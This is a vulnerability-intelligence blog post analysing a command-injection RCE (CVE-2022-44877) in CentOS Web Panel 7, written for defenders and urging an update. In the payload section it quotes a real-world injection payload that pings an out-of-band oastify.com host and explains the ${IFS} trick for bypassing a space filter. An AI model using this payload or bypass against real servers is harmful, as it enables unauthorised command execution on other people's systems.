POC for High Impact RCE Vulnerability in Centos Web Panel 7 (CVE-2022-44877) Increases Risk of Attacks

CloudSEK’s Threat Research team conducted an investigation to understand the technical details of CVE-2022-44877, and the internet-wide exploitation of CentOS Web Panel 7 installations.
Updated on
April 19, 2023
Published on
January 12, 2023
Subscribe to the latest industry news, threats and resources.
Category: Vulnerability Intelligence Vulnerability Class: Remote Code Execution CVE ID: CVE-2022-44877 CVSS:3.0 Score: NA(Not Assigned)

Executive Summary

  • A new remote command execution vulnerability was found in the web management portal of Centos(Control) web panel 7.
  • A threat actor can easily exploit the vulnerability with a crafted HTTP request.
  • The vulnerability can be leveraged to obtain a reverse shell and maintain persistence
  • A remote unauthenticated threat actor can perform ransomware attacks or exfiltrate data.
  • Update to the latest version as this affects Centos Web Panel 7 < v0.9.8.1147
  • The latest version - v0.9.8.1148

Investigation and Analysis

CloudSEK’s Threat Research team conducted an investigation to understand the technical details of CVE-2022-44877, and the internet-wide exploitation of CentOS Web Panel 7 installations. Through the course of our research, we discovered that post-exploitation, an attacker can execute commands remotely at the same privilege level the CentOS Web Panel is installed. In multiple cases, it was identified that the default privilege to host the installation was ‘root’ which is equivalent to the ‘Administrator’ privilege on Windows.

Technical Analysis - Proof of Concept Code

A security researcher released the POC on github and a POC video on Youtube on 5th Jan 2023 after getting assurance from the Centos team that a sufficient number of servers were patched. Upon analysis of the shared exploit code, it was identified that the flaw resided in the functionality which logged incorrect entries on the panel. Following is a sample code snippet responsible for writing content in the filename “wrong_entry.log
echo “incorrect_entry, IP address, HTTP_request_URI” >> ./wrong_entry.log
The double quotes in the above command are responsible for this misconfiguration, as this is a bash feature that helps execute a command. Since the HTTP_request_URI is attacker-controlled, a Threat Actor can insert a command that gets executed on the server. When the above command is executed we get a connection back to the listener shell. [caption id="attachment_22206" align="alignnone" width="1115"]Illustration of 2 shells Illustration of 2 shells[/caption] There are multiple vulnerable servers in the wild and threat actors have started exploiting them using the below-mentioned exploit payload. [caption id="attachment_22207" align="alignnone" width="1218"]The sample payload The sample payload[/caption]   Understanding the Payload
  • ping${IFS}-nc${IFS}2${IFS}222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com can be simplified to ping -nc 2 222gmd8w98u9qwf7x5z7kw73quwlkd82.oastify.com
  • The ${IFS} is a bash variable to give one space character. This is used to bypass the blank space bad character check.
  • Hence, we are trying to get a pingback from the vulnerable server.
[caption id="attachment_22208" align="alignnone" width="887"]We get the following DNS interaction from the vulnerable server We get the following DNS interaction from the vulnerable server[/caption]    

Information from OSINT - Exploitability & Presence

The Centos Web Panel 7 is a widely used server management tool. A Shodan query for it results in ~436,000 servers which could be potentially vulnerable to the Remote code execution vulnerability. [caption id="attachment_22209" align="alignnone" width="1681"]Shodan search query showing vulnerable servers Shodan search query showing vulnerable servers[/caption] The same pattern can also be observed from other search engines like Censys. [caption id="attachment_22210" align="alignnone" width="1582"]Censys search query showing vulnerable servers Censys search query showing vulnerable servers[/caption]


A high impact vulnerability that is also easily exploitable, is a prime target for threat actors. And given that the POC is now public, it makes the threat actors’ job that much easier. Hence we recommend that users update to the latest version, v0.9.8.1148.  


Get Global Threat Intelligence on Real Time

Protect your business from cyber threats with real-time global threat intelligence data.. 30-day free and No Commitment Trial.
Schedule a Demo
Real time Threat Intelligence Data
More information and context about Underground Chatter
On-Demand Research Services
Dashboard mockup
Global Threat Intelligence Feed

Protect and proceed with Actionable Intelligence

The Global Cyber Threat Intelligence Feed is an innovative platform that gathers information from various sources to help businesses and organizations stay ahead of potential cyber-attacks. This feed provides real-time updates on cyber threats, including malware, phishing scams, and other forms of cybercrime.
Trusted by 400+ Top organisations